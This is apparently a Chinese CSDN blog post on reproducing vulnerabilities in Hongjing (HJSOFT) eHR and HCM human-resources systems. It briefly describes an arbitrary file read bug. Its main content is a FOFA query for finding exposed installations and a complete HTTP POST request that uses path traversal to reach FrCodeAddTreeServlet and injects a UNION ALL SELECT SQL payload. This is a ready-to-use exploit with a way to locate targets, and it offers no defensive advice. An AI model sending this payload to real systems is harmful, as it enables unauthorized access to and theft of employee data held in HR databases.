漏洞复现-宏景HJSOFT系列

本文详细探讨了宏景人力系统中的一系列安全问题,包括任意文件读取和SQL注入漏洞。攻击者可以利用这些漏洞读取敏感信息、执行恶意数据库操作,影响宏景eHR和HCM人力资源管理系统。提供了相关接口和检测方法。
摘要由CSDN通过智能技术生成

在这里插入图片描述

宏景人力系统任意文件读取漏洞

https://mp.weixin.qq.com/s/CmKWktPt9FAXpXXnbaLKtw
宏景HCM人力资源管理系统outputcode接口处存在任意文件读取漏洞,攻击者可利用该漏洞读取服务器敏感信息文件,造成敏感信息泄露。

宏景eHR FrCodeAddTreeServlet SQL注入

https://mp.weixin.qq.com/s/1EVRDQ6-xvNxqcP7KK57iQ
该漏洞存在于宏景EHR人力资源管理系统的FrCodeAddTreeServlet接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
app=“HJSOFT-HCM”

在这里插入图片描述


POST /templates/attestation/../../servlet/FrCodeAddTreeServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
params=&issuperuser=&parentid=&privType=&manageprive=&action=&target=&showType=1' UNION ALL SELECT user,NULL,NULL,NULL,NULL,NULL-- fNwL&treetype=&orgt
  • 18
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值